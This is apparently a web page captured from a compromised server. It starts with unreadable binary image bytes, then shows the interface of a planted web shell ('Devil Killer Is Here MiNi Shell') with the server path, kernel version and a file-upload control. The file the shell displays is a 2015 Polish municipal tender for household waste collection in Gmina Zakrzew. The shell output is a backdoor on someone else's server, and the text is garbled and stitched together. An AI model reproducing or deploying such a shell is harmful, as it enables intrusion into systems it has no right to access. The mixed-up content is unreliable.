JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150528/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150528/77939-N-2015.html

<p class="kh_header"><b>Zakrzew: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy zakrzew.</b><br>
<b>Numer ogłoszenia: 77939 - 2015; data zamieszczenia: 28.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zakrzew , Zakrzew 26, 23-155 Zakrzew, woj. lubelskie, tel. 0-84 6809700, 6809712, faks 0-84 6809226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakrzew.lubelskie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy zakrzew..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowanie zmieszanych i zbieranych selektywnie odpadów komunalnych z terenu Gminy Zakrzew obejmujących  nieruchomości zamieszkałe przez mieszkańców Gminy Zakrzew, punkt selektywnej zbiórki odpadów komunalnych, pojemników (dzwonów) rozstawionych na terenie Gminy do selektywnej zbiórki odpadów.

1.  Charakterystyka  Gminy  
1) Powierzchnia gminy - 75 km 2.
2) Liczba mieszkańców zameldowanych na pobyt stały wg stanu na dzień 31.03.2015r.- 
3084.   
3) Szacowana liczba gospodarstw od których będą odbierane odpady - 780.                            Liczba gospodarstw w trakcie umowy może się zmieniać z powodów  naturalnych -     wyludniania  bądź pojawiania się nowych  gospodarstw.  
 4) Sołectwa wchodzące w skład Gminy Zakrzew: Annów, Baraki, Boża Wola, Dębina,   Karolin, Majdan Starowiejski, Nikodemów, Ponikwy, Szklarnia, Targowisko,     
Targowisko -  Kolonia, Tarnawka Druga, Tarnawka Pierwsza, Wólka Ponikiewska,   
Zakrzew, Zakrzew- Kolonia.
5) Ilość odebranych odpadów z terenu Gminy Zakrzew w 2014 r.: zmieszane - 172,36Mg, selektywnie zebrane - 46,61Mg
 6) Punkt Selektywnej zbiórki odpadów komunalnych mieści się w Zakrzewie na terenie   wysypiska odpadów komunalnych.
 7) Liczba pojemników (dzwonów) przeznaczonych do selektywnej zbiórki odpadów ( szkło i  plastik)  ustawionych na terenie Gminy - 26 szt.
 8) Mapa gminy stanowi załącznik nr 6 do SIWZ. Zaleca się dokonanie wizji lokalnej                          w terenie.
 9) Gmina Zakrzew  zgodnie z  Planem Gospodarki Odpadami Województwa Lubelskiego   należy do Regionu Południowo - Zachodniego.
10) Pojemniki na odpady zmieszane  o pojemności  120 litrów  dla mieszkańców zapewnia Gmina.
 Do dnia  15 czerwca 2015 r.  Gmina przekaże   wykaz nieruchomości/ gospodarstw domowych,  z których należy odbierać odpady wraz z informacją czy dane gospodarstwo zadeklarowało segregację śmieci. 

2.  Zakres rzeczowy przedmiotu zamówienia
    Odbiór odpadów komunalnych Wykonawca będzie świadczył zgodnie z przepisami, obowiązującego prawa, a w szczególności z: 
- ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz.U.2013.1232 j.t. z późn. zm.),
- ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U.         2013.1399.j.t.  z  późn. zm.),
-  ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 poz. 21. z późn. zm),
- rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie wzoru dokumentów stosowanych na potrzeby ewidencji odpadów (Dz.U.2014.1973.),
- rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014 r. w sprawie katalogu odpadów (Dz. U.2014.1923. ),
- rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U.2012. 630.),
- rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. 2013.122.),
- rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia oraz odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U.2012.645);
- rozporządzeniem Ministra Środowiska z dnia 28 maja 2012 r. w sprawie poziomów ograniczania masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz.U. 2012. 676.),
- Planem gospodarki odpadami dla województwa lubelskiego uchwalonym przez Sejmik Województwa Lubelskiego w dniu 30.07.2012 r. (Uchwała nr XXIV/396/2012).  
- obowiązującym  Regulaminem utrzymania czystości i porządku na terenie Gminy Zakrzew. 
   		
 Do obowiązków Wykonawcy należy:
 1) Odbiór pojemników i worków z odpadami ustawionych  przy najbliższej drodze publicznej  a także bezpośrednio z nieruchomości trudnodostępnych ( około 10% wszystkich nieruchomości)    następujących frakcji   odpadów: 
  a) odpady zmieszane, 
  b) odpady zbierane selektywnie: papier i tektura, szkło, tworzywa sztuczne, opakowania       wielomateriałowe, metale pod warunkiem zgromadzenia  ich przez właścicieli nieruchomości w odpowiednich pojemnikach lub workach. Wykonawca zobowiązany jest również                  do zebrania odpadów leżących obok    pojemników (posprzątania) gdy zajdzie taka potrzeba w tym również worków  dostawionych z nie segregowanymi odpadami, informując o tym Zamawiającego. Wykonawca będzie odbierał  odpady komunalne  od wszystkich właścicieli nieruchomości zamieszkałych w tym  z nieruchomości trudniej dostępnych poprzez zorganizowanie środków transportu, które umożliwią  odbiór odpadów  z tych  miejsc.
2) Odbiór odpadów, o których mowa w pkt 1)  z częstotliwością jeden raz w miesiącu             w godzinach   7 - 18 od poniedziałku do soboty.  Wykonawca zobowiązany jest                    do opracowania harmonogramu odbioru odpadów i uzyskania jego akceptacji ze strony Zamawiającego. Harmonogram odbioru odpadów ( po wcześniejszym jego  uzgodnieniu z Zamawiającym) Wykonawca  dostarczy mieszkańcom w terminie do 30.06.2015 r. Wykonawca jest zobowiązany poinformować mieszkańców o zmianie harmonogramu,  ( po uprzednim uzyskaniu akceptacji Zamawiającego na proponowaną zmianę),  z co najmniej dwutygodniowym wyprzedzeniem w stosunku do terminu od którego ma być stosowany. Zamawiający przewiduje możliwość odebrania odpadów w terminie innym niż wynikającym z uzgodnionego harmonogramu w przypadku zaistnienia obiektywnych okoliczności niezależnych od wykonawcy np. złe warunki atmosferyczne (intensywne opady deszczu, śniegu, roztopy) uniemożliwiające dojazd do miejsca odbioru odpadów.
 
3) Odbiór odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych na zgłoszenie    Zamawiającego, nie rzadziej niż raz w roku. Odpady będą zbierane w pojemniki dostarczone przez Wykonawcę.
4) Odbiór odpadów z pojemników do selektywnej zbiórki (szkło i plastik)  rozstawionych      na  terenie     Gminy Zakrzew(dzwonów) szt. 26 na zgłoszenie Zamawiającego  w miarę potrzeb nie rzadziej   niż raz w roku.
5) Wykonawca będzie dostarczał nieodpłatnie mieszkańcom Gminy Zakrzew zgodnie             z wykazem przekazanym przez Zamawiającego worki na segregowane odpady komunalne     w ilości wystarczającej. Worki  przezroczyste o pojemności 120 litrów z folii LDPE                o grubości zapewniającej  wytrzymałość worków ( min. 60 ?m) z czytelnie oznaczoną informacją o rodzaju gromadzonych odpadów, nazwą, adresem   i numerem telefonu Wykonawcy. Selektywnie zbierane do worków  odpady komunalne  obejmują: papier i tekturę,  szkło, tworzywa sztuczne,  metale, opakowania wielomateriałowe. Szacuje się średnio dwa worki na jedno gospodarstwo domowe miesięcznie. 
Pierwsze komplety worków należy dostarczyć właścicielom nieruchomości do 30 czerwca 2015r.
6) Wykonawca będzie dostarczał  nieodpłatnie  mieszkańcom Gminy Zakrzew  worki            na odpady zmieszane   w ilości wystarczającej. Worki czarne 120 litrów odpowiednio wytrzymałe i czytelnie oznaczone informacją o rodzaju gromadzonych odpadów, nazwą, adresem i numerem telefonu Wykonawcy. Szacowana ilość gospodarstw przewidzianych do odbioru odpadów zmieszanych gromadzonych w workach -10% gospodarstw.
Szacuje się średnio 2  worki na jedno gospodarstwo domowe miesięcznie. 
Pierwsze komplety worków należy dostarczyć właścicielom nieruchomości do 30 czerwca 2015 r.
7) Wykonawca raz w roku zorganizuje zbiórkę na terenie Gminy  odpadów wielkogabarytowych i sprzętu elektrycznego i elektronicznego w formie wystawki przy drodze    w poszczególnych miejscowościach.
8) Wykonawca  zmieszane odpady komunalne, odpady zielone będzie przekazywał               do Regionalnej instalacji przetwarzania odpadów komunalnych. Wykonawca w ramach  realizacji umowy nie może mieszać selektywnie zebranych odpadów komunalnych                  ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości oraz selektywnie zebranych odpadów komunalnych różnych rodzajów ze sobą.
9) Wykonawca w okresie obowiązywania umowy zobowiązany jest  do osiągnięcia w danym roku kalendarzowym ( dotyczy każdego roku w którym świadczy usługi tj.: 2015, 2016, 2017) w odniesieniu do masy odebranych odpadów  z terenu Gminy Zakrzew poziomu recyklingu i przygotowania do ponownego  użycia następujących frakcji  odpadów   komunalnych: papieru, metali, tworzyw sztucznych  i szkła  ,  przygotowania do ponownego użycia i odzysku  innymi metodami innych niż niebezpieczne odpadów budowlanych                            i rozbiórkowych  w wysokości określonej dla gmin  w przepisach  rozporządzenia  Ministra Środowiska  z dnia 29 maja 2012 roku w sprawie   poziomu recyklingu, przygotowania          do ponownego użycia  i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645).
9) Wykonawca w okresie obowiązywania umowy jest zobowiązany  ograniczyć w danym roku kalendarzowym ( dotyczy każdego roku w którym świadczy usługi tj.: 2015, 2016, 2017)  masę odpadów komunalnych ulegających biodegradacji   odbieranych    z terenu Gminy Zakrzew przekazywanych do składowania do wysokości  określonej w przepisach rozporządzenia  Ministra Środowiska  z dnia 25 maja  2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych  ulegających biodegradacji przekazywanych             do składowania oraz sposobu  obliczania poziomu ograniczania masy tych odpadów ( Dz. U. z 2012 poz. 676).
10) Wykonawca zobowiązany będzie do monitorowania ciążących na właścicielu nieruchomości  obowiązków w zakresie segregowania odpadów komunalnych, gromadzenia odpadów w pojemnikach i workach - zgodnie z obowiązującym Regulaminem utrzymania czystości i porządku na terenie Gminy Zakrzew i złożoną deklaracją. W przypadku    stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku segregacji odpadów, Wykonawca odbiera odpady jako zmieszane.   Przez monitorowanie  Zamawiający rozumie  sprawdzenie zawartości pojemników i  worków poprzez zajrzenie przez Wykonawcę do pojemników i  worków,  celem  stwierdzenia czy właściciel prowadzi selektywną zbiórkę odpadów. 
Wykonawca jest zobowiązany do niezwłocznego przekazania Zamawiającemu ( drogą elektroniczną, faksem lub pisemnie, maksymalnie do 7 dni roboczych ) informacji                        o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie gminy Zakrzew gromadzeniu odpadów, w szczególności ich mieszaniu lub  przygotowaniu do odbierania             w niewłaściwych pojemnikach lub przekazywaniu odpadów niezgodnie z deklaracją w zakresie selektywnego zbierania. Informacja powinna zawierać w szczególności: adres nieruchomości, na której odpady gromadzone są w sposób niezgodny z Regulaminem utrzymania czystości i porządku na terenie Gminy Zakrzew lub z deklaracją, dane pracowników, którzy stwierdzili fakty niezgodne z Regulaminem utrzymania czystości                i porządku na terenie Gminy Zakrzew lub z deklaracją oraz dokładną datę i godzinę stwierdzenia tych faktów. Wykonawca powinien udokumentować stwierdzone nieprawidłowości, np. poprzez wykonanie zdjęć, zapisów filmowych lub audiowizualnych,        w sposób umożliwiający jednoznaczne potwierdzenie nieprawidłowości, identyfikację miejsca i daty.        
11) Wykonawca zobowiązany jest do prowadzenia i przekazywania Zamawiającemu  dokumentacji związanej z przedmiotem zamówienia, w tym m.in.:
a) prowadzenia i przekazywania co miesiąc  Zamawiającemu: informacji o ilości odebranych odpadów (zmieszanych i selektywnie zebranych),  z podaniem ilości zebranych poszczególnych rodzajów odpadów, Oświadczenia o odebraniu odpadów wystawionych przez mieszkańców w danym miesiącu. 
b)sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości  i porządku               w gminach (Dz.U.2013.1399 j.t. z późn. zm.) - i przekazywania ich Wójtowi Gminy Zakrzew w terminie do końca miesiąca następującego po upływie półrocza, którego dotyczy                              wraz z dokumentami sporządzanymi na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania                        do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.
12)  Wykonawca zobowiązany jest  do:
 a) posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych                    od właścicieli oraz zapewnienia jego odpowiedniego stanu technicznego,
 b) utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń do odbierania odpadów komunalnych,
 c) spełnienia wymagań technicznych dotyczących wyposażenia pojazdów,
d) posiadania odpowiednio usytuowanej i wyposażonej  bazy magazynowo- transportowej
 
- z zachowaniem wszystkich wymogów wynikających z przepisów rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych    od właścicieli  nieruchomości (Dz.U. 2013.122).
13) Wykonawca jest zobowiązany do realizacji reklamacji np. nieodebranie odpadów zgodnie z harmonogramem, nie pozostawienie worków w przeciągu 48 godzin od otrzymania informacji od Zamawiającego.
14) System nie obejmuje odbioru odpadów wytwarzanych w wyniku prowadzonej     działalności gospodarczej.
15) Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia   pojemników z winy Wykonawcy, Wykonawca zobowiązany będzie do natychmiastowej    wymiany uszkodzonego pojemnika na własny koszt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.31.00-7, 90.53.30.00-2, 90.50.00.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie będzie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawcy
a) posiadają aktualne zezwolenie na zbieranie i transportowanie odpadów wydane            przez właściwy organ  zgodnie z ustawą z dnia 14 grudnia 2012 roku o odpadach ( Dz. U. z 2013 r. poz.21),
b) posiadają aktualny wpis do rejestru działalności  regulowanej  prowadzonej przez Wójta    Gminy Zakrzew, w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,
c) posiadają aktualne zezwolenie na prowadzenie działalności w zakresie przetwarzania    
odpadów komunalnych lub zapewnienie gotowości przyjęcia odpadów komunalnych przez   przedsiębiorcę prowadzącego działalność w zakresie odzysku i unieszkodliwiania odpadów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca :
a) będzie dysponował samochodami spełniającymi wymogi techniczne  do odbioru odpadów w łącznej ilości:
-  co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych,
- co najmniej dwa pojazdy przystosowane do odbierania odpadów komunalnych zbieranych  selektywnie,
- co najmniej jeden pojazd bez funkcji kompaktującej.
i na potwierdzenie spełnienia powyższego warunku przedstawi wykaz wymaganego sprzętu wraz z informacją o podstawie do dysponowania  tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca:
a)	posiada ubezpieczenie z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia ( odbiorem i zagospodarowaniem odpadów) na kwotę nie mniejszą  niż 300 000,00 zł i na potwierdzenie spełnienia powyższego warunku przedłoży Zamawiającemu  opłaconą polisę, a w przypadku jej braku inny dokument na sumę ubezpieczenia nie mniejszą niż 300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy,  2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2 ) składa dokument lub dokumenty wystawione  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty                     te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio- kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej  niż 6 miesięcy   przed upływem terminu składania ofert. 

3. W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego braku podstaw  do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach,     o których mowa w art. 24 ust.2 pkt 5 ustawy Pzp należy złożyć:

1) Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2    pkt 5 ustawy Pzp albo informację o tym, że Wykonawca nie należy do grupy kapitałowej             ( załącznik nr 4  do SIWZ ). 

